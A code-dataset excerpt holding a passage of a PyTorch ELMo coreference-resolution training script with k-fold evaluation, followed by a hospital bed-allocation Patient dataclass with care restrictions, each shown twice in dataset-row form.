torch.cat((curr_sent, torch.zeros((1, ELMoCharacterMapper.max_word_length), dtype=torch.long)))
)
encoded_segments = torch.stack(encoded_segments)
cluster_sets = []
mention_to_cluster_id = {}
for i, curr_cluster in enumerate(curr_doc.clusters):
cluster_sets.append(set(curr_cluster))
for mid in curr_cluster:
mention_to_cluster_id[mid] = i
all_candidate_data = []
for idx_head, (head_id, head_mention) in enumerate(curr_doc.mentions.items(), 1):
gt_antecedent_ids = cluster_sets[mention_to_cluster_id[head_id]]
# Note: no data for dummy antecedent (len(`features`) is one less than `candidates`)
candidates, candidate_data = [None], []
candidate_attention = []
correct_antecedents = []
curr_head_data = [[], []]
num_head_words = 0
for curr_token in head_mention.tokens:
idx_segment, idx_inside_segment = get_position(curr_token)
curr_head_data[0].append(idx_segment)
curr_head_data[1].append(idx_inside_segment)
num_head_words += 1
if num_head_words > self.max_span_size:
curr_head_data[0] = curr_head_data[0][:self.max_span_size]
curr_head_data[1] = curr_head_data[1][:self.max_span_size]
else:
curr_head_data[0] += [curr_head_data[0][-1]] * (self.max_span_size - num_head_words)
curr_head_data[1] += [-1] * (self.max_span_size - num_head_words)
head_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
head_attention[0, num_head_words:] = False
for idx_candidate, (cand_id, cand_mention) in enumerate(curr_doc.mentions.items(), start=1):
if idx_candidate >= idx_head:
break
candidates.append(cand_id)
# Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later
curr_candidate_data = [[], []]
num_candidate_words = 0
for curr_token in cand_mention.tokens:
idx_segment, idx_inside_segment = get_position(curr_token)
curr_candidate_data[0].append(idx_segment)
curr_candidate_data[1].append(idx_inside_segment)
num_candidate_words += 1
if num_candidate_words > self.max_span_size:
curr_candidate_data[0] = curr_candidate_data[0][:self.max_span_size]
curr_candidate_data[1] = curr_candidate_data[1][:self.max_span_size]
else:
# padding tokens index into the PAD token of the last segment
curr_candidate_data[0] += [curr_candidate_data[0][-1]] * (self.max_span_size - num_candidate_words)
curr_candidate_data[1] += [-1] * (self.max_span_size - num_candidate_words)
candidate_data.append(curr_candidate_data)
curr_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
curr_attention[0, num_candidate_words:] = False
candidate_attention.append(curr_attention)
is_coreferent = cand_id in gt_antecedent_ids
if is_coreferent:
correct_antecedents.append(idx_candidate)
if len(correct_antecedents) == 0:
correct_antecedents.append(0)
candidate_attention = torch.cat(candidate_attention) if len(candidate_attention) > 0 else []
all_candidate_data.append({
"head_id": head_id,
"head_data": torch.tensor([curr_head_data]),
"head_attention": head_attention,
"candidates": candidates,
"candidate_data": torch.tensor(candidate_data),
"candidate_attention": candidate_attention,
"correct_antecedents": correct_antecedents
})
ret["preprocessed_segments"] = encoded_segments
ret["steps"] = all_candidate_data
return ret
def _train_doc(self, curr_doc, eval_mode=False):
""" Trains/evaluates (if `eval_mode` is True) model on specific document.
Returns predictions, loss and number of examples evaluated. """
if len(curr_doc.mentions) == 0:
return {}, (0.0, 0)
if not hasattr(curr_doc, "_cache_elmo"):
curr_doc._cache_elmo = self._prepare_doc(curr_doc)
cache = curr_doc._cache_elmo # type: Dict
encoded_segments = cache["preprocessed_segments"]
if self.freeze_pretrained:
with torch.no_grad():
res = self.embedder(encoded_segments.to(DEVICE))
else:
res = self.embedder(encoded_segments.to(DEVICE))
# Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1)
embedded_segments = res["elmo_representations"][0] # [num_segments, max_segment_size, embedding_size]
(lstm_segments, _) = self.context_encoder(embedded_segments) # [num_segments, max_segment_size, 2 * hidden_size]
doc_loss, n_examples = 0.0, len(cache["steps"])
preds = {}
for curr_step in cache["steps"]:
head_id = curr_step["head_id"]
head_data = curr_step["head_data"]
candidates = curr_step["candidates"]
candidate_data = curr_step["candidate_data"]
correct_antecedents = curr_step["correct_antecedents"]
# Note: num_candidates includes dummy antecedent + actual candidates
num_candidates = len(candidates)
if num_candidates == 1:
curr_pred = 0
else:
idx_segment = candidate_data[:, 0, :]
idx_in_segment = candidate_data[:, 1, :]
# [num_candidates, max_span_size, embedding_size]
candidate_data = lstm_segments[idx_segment, idx_in_segment]
# [1, head_size, embedding_size]
head_data = lstm_segments[head_data[:, 0, :], head_data[:, 1, :]]
head_data = head_data.repeat((num_candidates - 1, 1, 1))
candidate_scores = self.scorer(candidate_data, head_data,
curr_step["candidate_attention"],
curr_step["head_attention"].repeat((num_candidates - 1, 1)))
# [1, num_candidates]
candidate_scores = torch.cat((torch.tensor([0.0], device=DEVICE),
candidate_scores.flatten())).unsqueeze(0)
curr_pred = torch.argmax(candidate_scores)
doc_loss += self.loss(candidate_scores.repeat((len(correct_antecedents), 1)),
torch.tensor(correct_antecedents, device=DEVICE))
# { antecedent: [mention(s)] } pair
existing_refs = preds.get(candidates[int(curr_pred)], [])
existing_refs.append(head_id)
preds[candidates[int(curr_pred)]] = existing_refs
if not eval_mode:
doc_loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
return preds, (float(doc_loss), n_examples)
if __name__ == "__main__":
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)
args = parser.parse_args()
if args.random_seed:
np.random.seed(args.random_seed)
torch.random.manual_seed(args.random_seed)
documents = read_corpus(args.dataset)
def create_model_instance(model_name, **override_kwargs):
return ContextualControllerELMo(model_name=model_name,
fc_hidden_size=override_kwargs.get("fc_hidden_size", args.fc_hidden_size),
hidden_size=override_kwargs.get("hidden_size", args.hidden_size),
dropout=override_kwargs.get("dropout", args.dropout),
pretrained_embeddings_dir="../data/slovenian-elmo",
freeze_pretrained=override_kwargs.get("freeze_pretrained", args.freeze_pretrained),
learning_rate=override_kwargs.get("learning_rate", args.learning_rate),
max_segment_size=override_kwargs.get("max_segment_size", args.max_segment_size),
layer_learning_rate={
"lr_embedder": 10e-5} if not args.freeze_pretrained else None,
dataset_name=override_kwargs.get("dataset", args.dataset))
# Train model
if args.dataset == "coref149":
INNER_K, OUTER_K = 3, 10
logging.info(f"Performing {OUTER_K}-fold (outer) and {INNER_K}-fold (inner) CV...")
save_path = "cache_run_contextual_elmo_coref149.json"
if args.kfold_state_cache_path is None:
train_test_folds = KFold(n_splits=OUTER_K, shuffle=True).split(documents)
train_test_folds = [{
"train_docs": [documents[_i].doc_id for _i in train_dev_index],
"test_docs": [documents[_i].doc_id for _i in test_index]
} for train_dev_index, test_index in train_test_folds]
fold_cache = KFoldStateCache(script_name="contextual_model_elmo.py",
script_args=vars(args),
main_dataset=args.dataset,
additional_dataset=None,
fold_info=train_test_folds)
else:
fold_cache = KFoldStateCache.from_file(args.kfold_state_cache_path)
OUTER_K = fold_cache.num_folds
for curr_fold_data in fold_cache.get_next_unfinished():
curr_train_dev_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["train_docs"]), documents))
curr_test_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["test_docs"]), documents))
logging.info(f"Fold#{curr_fold_data['idx_fold']}...")
best_metric, best_name = float("inf"), None
for idx_inner_fold, (train_index, dev_index) in enumerate(KFold(n_splits=INNER_K).split(curr_train_dev_docs)):
curr_train_docs = [curr_train_dev_docs[_i] for _i in train_index]
curr_dev_docs = [curr_train_dev_docs[_i] for _i in dev_index]
curr_model = create_model_instance(model_name=f"fold{curr_fold_data['idx_fold']}_{idx_inner_fold}")
dev_loss = curr_model.train(epochs=args.num_epochs, train_docs=curr_train_docs, dev_docs=curr_dev_docs)
logging.info(f"Fold {curr_fold_data['idx_fold']}-{idx_inner_fold}: {dev_loss: .5f}")
if dev_loss < best_metric:
best_metric = dev_loss
best_name = curr_model.path_model_dir
logging.info(f"Best model: {best_name}, best loss: {best_metric: .5f}")
curr_model = ContextualControllerELMo.from_pretrained(best_name)
curr_test_metrics = curr_model.evaluate(curr_test_docs)
curr_model.visualize()
curr_test_metrics_expanded = {}
for metric, metric_value in curr_test_metrics.items():
curr_test_metrics_expanded[f"{metric}_p"] = float(metric_value.precision())
curr_test_metrics_expanded[f"{metric}_r"] = float(metric_value.recall())
curr_test_metrics_expanded[f"{metric}_f1"] = float(metric_value.f1())
fold_cache.add_results(idx_fold=curr_fold_data["idx_fold"], results=curr_test_metrics_expanded)
fold_cache.save(save_path)
logging.info(f"Final scores (over {OUTER_K} folds)")
aggregated_metrics = {}
for curr_fold_data in fold_cache.fold_info:
for metric, metric_value in curr_fold_data["results"].items():
existing = aggregated_metrics.get(metric, [])
existing.append(metric_value)
aggregated_metrics[metric] = existing
for metric, metric_values in aggregated_metrics.items():
logging.info(f"- {metric}: mean={np.mean(metric_values): .4f} +- sd={np.std(metric_values): .4f}\n"
f"\t all fold scores: {metric_values}")
else:
logging.info(f"Using single train/dev/test split...")
if args.fixed_split:
logging.info("Using fixed dataset split")
train_docs, dev_docs, test_docs = fixed_split(documents, args.dataset)
else:
train_docs, dev_docs, test_docs = split_into_sets(documents, train_prop=0.7, dev_prop=0.15, test_prop=0.15)
model = create_model_instance(model_name=args.model_name)
if not model.loaded_from_file:
model.train(epochs=args.num_epochs, train_docs=train_docs, dev_docs=dev_docs)
# Reload best checkpoint
model = ContextualControllerELMo.from_pretrained(model.path_model_dir)
model.evaluate(test_docs)
model.visualize()
| import argparse
import json
import logging
import os
import sys
from itertools import chain
from typing import Optional, Dict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from allennlp.data.token_indexers.elmo_indexer import ELMoCharacterMapper
from allennlp.modules.elmo import Elmo, batch_to_ids
from sklearn.model_selection import KFold
from common import ControllerBase, NeuralCoreferencePairScorer
from utils import split_into_sets, fixed_split, KFoldStateCache
from data import read_corpus, Document
parser = argparse.ArgumentParser()
parser.add_argument("--model_name", type=str, default=None)
parser.add_argument("--hidden_size", type=int, default=128)
parser.add_argument("--fc_hidden_size", type=int, default=150)
parser.add_argument("--dropout", type=float, default=0.2)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epochs", type=int, default=10)
parser.add_argument("--max_segment_size", type=int, default=None,
help="Size of nonoverlapping segments into which a document will be split, with each segment being "
"processed independently. By default, a segment corresponds to a single sentence.")
parser.add_argument("--dataset", type=str, default="coref149")
parser.add_argument("--random_seed", type=int, default=13)
parser.add_argument("--freeze_pretrained", action="store_true")
parser.add_argument("--fixed_split", action="store_true")
parser.add_argument("--kfold_state_cache_path", type=str, default=None)
DEVICE = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class ContextualControllerELMo(ControllerBase):
def __init__(self,
hidden_size,
dropout,
pretrained_embeddings_dir,
dataset_name,
fc_hidden_size=150,
freeze_pretrained=True,
learning_rate=0.001,
layer_learning_rate: Optional[Dict[str, float]] = None,
max_segment_size=None, # if None, process sentences independently
max_span_size=10,
model_name=None):
self.hidden_size = hidden_size
self.dropout = dropout
self.freeze_pretrained = freeze_pretrained
self.fc_hidden_size = fc_hidden_size
self.max_span_size = max_span_size
self.max_segment_size = max_segment_size
self.learning_rate = learning_rate
self.layer_learning_rate = layer_learning_rate if layer_learning_rate is not None else {}
self.pretrained_embeddings_dir = pretrained_embeddings_dir
self.embedder = Elmo(options_file=os.path.join(pretrained_embeddings_dir, "options.json"),
weight_file=os.path.join(pretrained_embeddings_dir, "slovenian-elmo-weights.hdf5"),
dropout=(0.0 if freeze_pretrained else dropout),
num_output_representations=1,
requires_grad=(not freeze_pretrained)).to(DEVICE)
embedding_size = self.embedder.get_output_dim()
self.context_encoder = nn.LSTM(input_size=embedding_size, hidden_size=hidden_size,
batch_first=True, bidirectional=True).to(DEVICE)
self.scorer = NeuralCoreferencePairScorer(num_features=(2 * hidden_size),
hidden_size=fc_hidden_size,
dropout=dropout).to(DEVICE)
params_to_update = [
{
"params": self.scorer.parameters(),
"lr": self.layer_learning_rate.get("lr_scorer", self.learning_rate)
},
{
"params": self.context_encoder.parameters(),
"lr": self.layer_learning_rate.get("lr_context_encoder", self.learning_rate)
}
]
if not freeze_pretrained:
params_to_update.append({
"params": self.embedder.parameters(),
"lr": self.layer_learning_rate.get("lr_embedder", self.learning_rate)
})
self.optimizer = optim.Adam(params_to_update, lr=self.learning_rate)
super().__init__(learning_rate=learning_rate, dataset_name=dataset_name, model_name=model_name)
logging.info(f"Initialized contextual ELMo-based model with name {self.model_name}.")
@property
def model_base_dir(self):
return "contextual_model_elmo"
def train_mode(self):
if not self.freeze_pretrained:
self.embedder.train()
self.context_encoder.train()
self.scorer.train()
def eval_mode(self):
self.embedder.eval()
self.context_encoder.eval()
self.scorer.eval()
def load_checkpoint(self):
self.loaded_from_file = True
self.context_encoder.load_state_dict(torch.load(os.path.join(self.path_model_dir, "context_encoder.th"),
map_location=DEVICE))
self.scorer.load_state_dict(torch.load(os.path.join(self.path_model_dir, "scorer.th"),
map_location=DEVICE))
path_to_embeddings = os.path.join(self.path_model_dir, "embeddings.th")
if os.path.isfile(path_to_embeddings):
logging.info(f"Loading fine-tuned ELMo weights from '{path_to_embeddings}'")
self.embedder.load_state_dict(torch.load(path_to_embeddings, map_location=DEVICE))
@staticmethod
def from_pretrained(model_dir):
controller_config_path = os.path.join(model_dir, "controller_config.json")
with open(controller_config_path, "r", encoding="utf-8") as f_config:
pre_config = json.load(f_config)
instance = ContextualControllerELMo(**pre_config)
instance.load_checkpoint()
return instance
def save_pretrained(self, model_dir):
if not os.path.exists(model_dir):
os.makedirs(model_dir)
# Write controller config (used for instantiation)
controller_config_path = os.path.join(model_dir, "controller_config.json")
with open(controller_config_path, "w", encoding="utf-8") as f_config:
json.dump({
"hidden_size": self.hidden_size,
"dropout": self.dropout,
"pretrained_embeddings_dir": self.pretrained_embeddings_dir,
"dataset_name": self.dataset_name,
"fc_hidden_size": self.fc_hidden_size,
"freeze_pretrained": self.freeze_pretrained,
"learning_rate": self.learning_rate,
"layer_learning_rate": self.layer_learning_rate,
"max_segment_size": self.max_segment_size,
"max_span_size": self.max_span_size,
"model_name": self.model_name
}, fp=f_config, indent=4)
torch.save(self.context_encoder.state_dict(), os.path.join(self.path_model_dir, "context_encoder.th"))
torch.save(self.scorer.state_dict(), os.path.join(self.path_model_dir, "scorer.th"))
# Save fine-tuned ELMo embeddings only if they're not frozen
if not self.freeze_pretrained:
torch.save(self.embedder.state_dict(), os.path.join(self.path_model_dir, "embeddings.th"))
def save_checkpoint(self):
logging.warning("save_checkpoint() is deprecated. Use save_pretrained() instead")
self.save_pretrained(self.path_model_dir)
def _prepare_doc(self, curr_doc: Document) -> Dict:
""" Returns a cache dictionary with preprocessed data. This should only be called once per document, since
data inside same document does not get shuffled. """
ret = {}
# By default, each sentence is its own segment, meaning sentences are processed independently
if self.max_segment_size is None:
def get_position(t):
return t.sentence_index, t.position_in_sentence
_encoded_segments = batch_to_ids(curr_doc.raw_sentences())
# Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently
else:
def get_position(t):
doc_position = t.position_in_document
return doc_position // self.max_segment_size, doc_position % self.max_segment_size
flattened_doc = list(chain(*curr_doc.raw_sentences()))
num_segments = (len(flattened_doc) + self.max_segment_size - 1) // self.max_segment_size
_encoded_segments = \
batch_to_ids([flattened_doc[idx_seg * self.max_segment_size: (idx_seg + 1) * self.max_segment_size]
for idx_seg in range(num_segments)])
encoded_segments = []
# Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions
for curr_sent in _encoded_segments:
encoded_segments.append(
torch.cat((curr_sent, torch.zeros((1, ELMoCharacterMapper.max_word_length), dtype=torch.long)))
)
encoded_segments = torch.stack(encoded_segments)
cluster_sets = []
mention_to_cluster_id = {}
for i, curr_cluster in enumerate(curr_doc.clusters):
cluster_sets.append(set(curr_cluster))
for mid in curr_cluster:
mention_to_cluster_id[mid] = i
all_candidate_data = []
for idx_head, (head_id, head_mention) in enumerate(curr_doc.mentions.items(), 1):
gt_antecedent_ids = cluster_sets[mention_to_cluster_id[head_id]]
# Note: no data for dummy antecedent (len(`features`) is one less than `candidates`)
candidates, candidate_data = [None], []
candidate_attention = []
correct_antecedents = []
curr_head_data = [[], []]
num_head_words = 0
for curr_token in head_mention.tokens:
idx_segment, idx_inside_segment = get_position(curr_token)
curr_head_data[0].append(idx_segment)
curr_head_data[1].append(idx_inside_segment)
num_head_words += 1
if num_head_words > self.max_span_size:
curr_head_data[0] = curr_head_data[0][:self.max_span_size]
curr_head_data[1] = curr_head_data[1][:self.max_span_size]
else:
curr_head_data[0] += [curr_head_data[0][-1]] * (self.max_span_size - num_head_words)
curr_head_data[1] += [-1] * (self.max_span_size - num_head_words)
head_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
head_attention[0, num_head_words:] = False
for idx_candidate, (cand_id, cand_mention) in enumerate(curr_doc.mentions.items(), start=1):
if idx_candidate >= idx_head:
break
candidates.append(cand_id)
# Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later
curr_candidate_data = [[], []]
num_candidate_words = 0
for curr_token in cand_mention.tokens:
idx_segment, idx_inside_segment = get_position(curr_token)
curr_candidate_data[0].append(idx_segment)
curr_candidate_data[1].append(idx_inside_segment)
num_candidate_words += 1
if num_candidate_words > self.max_span_size:
curr_candidate_data[0] = curr_candidate_data[0][:self.max_span_size]
curr_candidate_data[1] = curr_candidate_data[1][:self.max_span_size]
else:
# padding tokens index into the PAD token of the last segment
curr_candidate_data[0] += [curr_candidate_data[0][-1]] * (self.max_span_size - num_candidate_words)
curr_candidate_data[1] += [-1] * (self.max_span_size - num_candidate_words)
candidate_data.append(curr_candidate_data)
curr_attention = torch.ones((1, self.max_span_size), dtype=torch.bool)
curr_attention[0, num_candidate_words:] = False
candidate_attention.append(curr_attention)
is_coreferent = cand_id in gt_antecedent_ids
if is_coreferent:
correct_antecedents.append(idx_candidate)
if len(correct_antecedents) == 0:
correct_antecedents.append(0)
candidate_attention = torch.cat(candidate_attention) if len(candidate_attention) > 0 else []
all_candidate_data.append({
"head_id": head_id,
"head_data": torch.tensor([curr_head_data]),
"head_attention": head_attention,
"candidates": candidates,
"candidate_data": torch.tensor(candidate_data),
"candidate_attention": candidate_attention,
"correct_antecedents": correct_antecedents
})
ret["preprocessed_segments"] = encoded_segments
ret["steps"] = all_candidate_data
return ret
def _train_doc(self, curr_doc, eval_mode=False):
""" Trains/evaluates (if `eval_mode` is True) model on specific document.
Returns predictions, loss and number of examples evaluated. """
if len(curr_doc.mentions) == 0:
return {}, (0.0, 0)
if not hasattr(curr_doc, "_cache_elmo"):
curr_doc._cache_elmo = self._prepare_doc(curr_doc)
cache = curr_doc._cache_elmo # type: Dict
encoded_segments = cache["preprocessed_segments"]
if self.freeze_pretrained:
with torch.no_grad():
res = self.embedder(encoded_segments.to(DEVICE))
else:
res = self.embedder(encoded_segments.to(DEVICE))
# Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1)
embedded_segments = res["elmo_representations"][0] # [num_segments, max_segment_size, embedding_size]
(lstm_segments, _) = self.context_encoder(embedded_segments) # [num_segments, max_segment_size, 2 * hidden_size]
doc_loss, n_examples = 0.0, len(cache["steps"])
preds = {}
for curr_step in cache["steps"]:
head_id = curr_step["head_id"]
head_data = curr_step["head_data"]
candidates = curr_step["candidates"]
candidate_data = curr_step["candidate_data"]
correct_antecedents = curr_step["correct_antecedents"]
# Note: num_candidates includes dummy antecedent + actual candidates
num_candidates = len(candidates)
if num_candidates == 1:
curr_pred = 0
else:
idx_segment = candidate_data[:, 0, :]
idx_in_segment = candidate_data[:, 1, :]
# [num_candidates, max_span_size, embedding_size]
candidate_data = lstm_segments[idx_segment, idx_in_segment]
# [1, head_size, embedding_size]
head_data = lstm_segments[head_data[:, 0, :], head_data[:, 1, :]]
head_data = head_data.repeat((num_candidates - 1, 1, 1))
candidate_scores = self.scorer(candidate_data, head_data,
curr_step["candidate_attention"],
curr_step["head_attention"].repeat((num_candidates - 1, 1)))
# [1, num_candidates]
candidate_scores = torch.cat((torch.tensor([0.0], device=DEVICE),
candidate_scores.flatten())).unsqueeze(0)
curr_pred = torch.argmax(candidate_scores)
doc_loss += self.loss(candidate_scores.repeat((len(correct_antecedents), 1)),
torch.tensor(correct_antecedents, device=DEVICE))
# { antecedent: [mention(s)] } pair
existing_refs = preds.get(candidates[int(curr_pred)], [])
existing_refs.append(head_id)
preds[candidates[int(curr_pred)]] = existing_refs
if not eval_mode:
doc_loss.backward()
self.optimizer.step()
self.optimizer.zero_grad()
return preds, (float(doc_loss), n_examples)
if __name__ == "__main__":
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)
args = parser.parse_args()
if args.random_seed:
np.random.seed(args.random_seed)
torch.random.manual_seed(args.random_seed)
documents = read_corpus(args.dataset)
def create_model_instance(model_name, **override_kwargs):
return ContextualControllerELMo(model_name=model_name,
fc_hidden_size=override_kwargs.get("fc_hidden_size", args.fc_hidden_size),
hidden_size=override_kwargs.get("hidden_size", args.hidden_size),
dropout=override_kwargs.get("dropout", args.dropout),
pretrained_embeddings_dir="../data/slovenian-elmo",
freeze_pretrained=override_kwargs.get("freeze_pretrained", args.freeze_pretrained),
learning_rate=override_kwargs.get("learning_rate", args.learning_rate),
max_segment_size=override_kwargs.get("max_segment_size", args.max_segment_size),
layer_learning_rate={
"lr_embedder": 10e-5} if not args.freeze_pretrained else None,
dataset_name=override_kwargs.get("dataset", args.dataset))
# Train model
if args.dataset == "coref149":
INNER_K, OUTER_K = 3, 10
logging.info(f"Performing {OUTER_K}-fold (outer) and {INNER_K}-fold (inner) CV...")
save_path = "cache_run_contextual_elmo_coref149.json"
if args.kfold_state_cache_path is None:
train_test_folds = KFold(n_splits=OUTER_K, shuffle=True).split(documents)
train_test_folds = [{
"train_docs": [documents[_i].doc_id for _i in train_dev_index],
"test_docs": [documents[_i].doc_id for _i in test_index]
} for train_dev_index, test_index in train_test_folds]
fold_cache = KFoldStateCache(script_name="contextual_model_elmo.py",
script_args=vars(args),
main_dataset=args.dataset,
additional_dataset=None,
fold_info=train_test_folds)
else:
fold_cache = KFoldStateCache.from_file(args.kfold_state_cache_path)
OUTER_K = fold_cache.num_folds
for curr_fold_data in fold_cache.get_next_unfinished():
curr_train_dev_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["train_docs"]), documents))
curr_test_docs = list(filter(lambda doc: doc.doc_id in set(curr_fold_data["test_docs"]), documents))
logging.info(f"Fold#{curr_fold_data['idx_fold']}...")
best_metric, best_name = float("inf"), None
for idx_inner_fold, (train_index, dev_index) in enumerate(KFold(n_splits=INNER_K).split(curr_train_dev_docs)):
curr_train_docs = [curr_train_dev_docs[_i] for _i in train_index]
curr_dev_docs = [curr_train_dev_docs[_i] for _i in dev_index]
curr_model = create_model_instance(model_name=f"fold{curr_fold_data['idx_fold']}_{idx_inner_fold}")
dev_loss = curr_model.train(epochs=args.num_epochs, train_docs=curr_train_docs, dev_docs=curr_dev_docs)
logging.info(f"Fold {curr_fold_data['idx_fold']}-{idx_inner_fold}: {dev_loss: .5f}")
if dev_loss < best_metric:
best_metric = dev_loss
best_name = curr_model.path_model_dir
logging.info(f"Best model: {best_name}, best loss: {best_metric: .5f}")
curr_model = ContextualControllerELMo.from_pretrained(best_name)
curr_test_metrics = curr_model.evaluate(curr_test_docs)
curr_model.visualize()
curr_test_metrics_expanded = {}
for metric, metric_value in curr_test_metrics.items():
curr_test_metrics_expanded[f"{metric}_p"] = float(metric_value.precision())
curr_test_metrics_expanded[f"{metric}_r"] = float(metric_value.recall())
curr_test_metrics_expanded[f"{metric}_f1"] = float(metric_value.f1())
fold_cache.add_results(idx_fold=curr_fold_data["idx_fold"], results=curr_test_metrics_expanded)
fold_cache.save(save_path)
logging.info(f"Final scores (over {OUTER_K} folds)")
aggregated_metrics = {}
for curr_fold_data in fold_cache.fold_info:
for metric, metric_value in curr_fold_data["results"].items():
existing = aggregated_metrics.get(metric, [])
existing.append(metric_value)
aggregated_metrics[metric] = existing
for metric, metric_values in aggregated_metrics.items():
logging.info(f"- {metric}: mean={np.mean(metric_values): .4f} +- sd={np.std(metric_values): .4f}\n"
f"\t all fold scores: {metric_values}")
else:
logging.info(f"Using single train/dev/test split...")
if args.fixed_split:
logging.info("Using fixed dataset split")
train_docs, dev_docs, test_docs = fixed_split(documents, args.dataset)
else:
train_docs, dev_docs, test_docs = split_into_sets(documents, train_prop=0.7, dev_prop=0.15, test_prop=0.15)
model = create_model_instance(model_name=args.model_name)
if not model.loaded_from_file:
model.train(epochs=args.num_epochs, train_docs=train_docs, dev_docs=dev_docs)
# Reload best checkpoint
model = ContextualControllerELMo.from_pretrained(model.path_model_dir)
model.evaluate(test_docs)
model.visualize()
| en | 0.769076 | # if None, process sentences independently # Write controller config (used for instantiation) # Save fine-tuned ELMo embeddings only if they're not frozen Returns a cache dictionary with preprocessed data. This should only be called once per document, since data inside same document does not get shuffled. # By default, each sentence is its own segment, meaning sentences are processed independently # Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently # Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions # Note: no data for dummy antecedent (len(`features`) is one less than `candidates`) # Maps tokens to positions inside segments (idx_seg, idx_inside_seg) for efficient indexing later # padding tokens index into the PAD token of the last segment Trains/evaluates (if `eval_mode` is True) model on specific document. Returns predictions, loss and number of examples evaluated. # type: Dict # Note: max_segment_size is either specified at instantiation or (the length of longest sentence + 1) # [num_segments, max_segment_size, embedding_size] # [num_segments, max_segment_size, 2 * hidden_size] # Note: num_candidates includes dummy antecedent + actual candidates # [num_candidates, max_span_size, embedding_size] # [1, head_size, embedding_size] # [1, num_candidates] # { antecedent: [mention(s)] } pair # Train model #{curr_fold_data['idx_fold']}...") # Reload best checkpoint | 2.102326 | 2 |
src/hospital/people.py | nhsx-mirror/skunkworks-bed-allocation | 12 | 6614017 | <reponame>nhsx-mirror/skunkworks-bed-allocation<filename>src/hospital/people.py<gh_stars>10-100
from dataclasses import asdict, dataclass, field
from enum import Enum
from typing import Any, Dict, Optional
from warnings import warn
import hospital.restrictions.people as R
from hospital.data import Department, Sex, Specialty
from hospital.equipment.bed import Bed
@dataclass
class Patient:
"""
Patient dataclass
"""
name: str
sex: str
department: str
specialty: str = "general"
weight: float = 70.0
age: Optional[int] = None
is_known_covid: bool = False
is_suspected_covid: bool = False
is_acute_surgical: bool = False
is_elective: bool = False
needs_mobility_assistence: bool = False
is_dementia_risk: bool = False
is_high_acuity: bool = False
is_immunosupressed: bool = False
is_end_of_life: bool = False
is_infection_control: bool = False
is_falls_risk: bool = False
needs_visual_supervision: bool = False
expected_length_of_stay: int = 1
length_of_stay: int = 0
bed: Optional[Bed] = None
restrictions: list = field(default_factory=list)
def __post_init__(self):
# convert and validate enums
self.sex = self._validate_enums(self.sex, Sex)
self.department = self._validate_enums(self.department, Department)
self.specialty = self._validate_enums(self.specialty, Specialty)
# initialise restrictions
if self.is_immunosupressed:
self.restrictions.append(R.NeedsSideRoom(10))
if self.is_end_of_life:
self.restrictions.append(R.NeedsSideRoom(3))
if self.is_infection_control:
self.restrictions.append(R.NeedsSideRoom(4))
if self.is_falls_risk:
self.restrictions.append(R.ProhibitedSideRoom(5))
if self.needs_visual_supervision:
self.restrictions.append(R.NeedsVisualSupervision(5))
def _validate_enums(self, value, enum_class):
try:
return enum_class[value.lower()]
except KeyError:
print(
f"Incorrect value for {enum_class.__name__.lower()} ",
f"attribute : {value}",
)
def eval_restrictions(self):
penalty = 0
names = []
for r in self.restrictions:
total_penalty = r.evaluate(self)
if total_penalty > 0:
n, p = r._key()
penalty += total_penalty
names += [n for _ in range(int(total_penalty / p))]
return {"score": penalty, "names": names}
def allocate(self, bed):
if self.bed is not None:
warn(f"Patient {self.name} is already in bed {self.bed.name}.")
self.bed = bed
def discharge(self):
self.bed = None
def patient_to_dict(patient: Patient) -> Dict[str, Any]:
"""
Returns dictionary representation of a Patient class instance.
"""
def _patient_dict(patient: Patient) -> Dict[str, Any]:
"""
Dictionary factory to convert Patient class instance
to patient details dictionary.
"""
return {
field: (value if not isinstance(value, Enum) else value.name)
for field, value in patient
}
return asdict(patient, dict_factory=_patient_dict)
| from dataclasses import asdict, dataclass, field
from enum import Enum
from typing import Any, Dict, Optional
from warnings import warn
import hospital.restrictions.people as R
from hospital.data import Department, Sex, Specialty
from hospital.equipment.bed import Bed
@dataclass
class Patient:
"""
Patient dataclass
"""
name: str
sex: str
department: str
specialty: str = "general"
weight: float = 70.0
age: Optional[int] = None
is_known_covid: bool = False
is_suspected_covid: bool = False
is_acute_surgical: bool = False
is_elective: bool = False
needs_mobility_assistence: bool = False
is_dementia_risk: bool = False
is_high_acuity: bool = False
is_immunosupressed: bool = False
is_end_of_life: bool = False
is_infection_control: bool = False
is_falls_risk: bool = False
needs_visual_supervision: bool = False
expected_length_of_stay: int = 1
length_of_stay: int = 0
bed: Optional[Bed] = None
restrictions: list = field(default_factory=list)
def __post_init__(self):
# convert and validate enums
self.sex = self._validate_enums(self.sex, Sex)
self.department = self._validate_enums(self.department, Department)
self.specialty = self._validate_enums(self.specialty, Specialty)
# initialise restrictions
if self.is_immunosupressed:
self.restrictions.append(R.NeedsSideRoom(10))
if self.is_end_of_life:
self.restrictions.append(R.NeedsSideRoom(3))
if self.is_infection_control:
self.restrictions.append(R.NeedsSideRoom(4))
if self.is_falls_risk:
self.restrictions.append(R.ProhibitedSideRoom(5))
if self.needs_visual_supervision:
self.restrictions.append(R.NeedsVisualSupervision(5))
def _validate_enums(self, value, enum_class):
try:
return enum_class[value.lower()]
except KeyError:
print(
f"Incorrect value for {enum_class.__name__.lower()} ",
f"attribute : {value}",
)
def eval_restrictions(self):
penalty = 0
names = []
for r in self.restrictions:
total_penalty = r.evaluate(self)
if total_penalty > 0:
n, p = r._key()
penalty += total_penalty
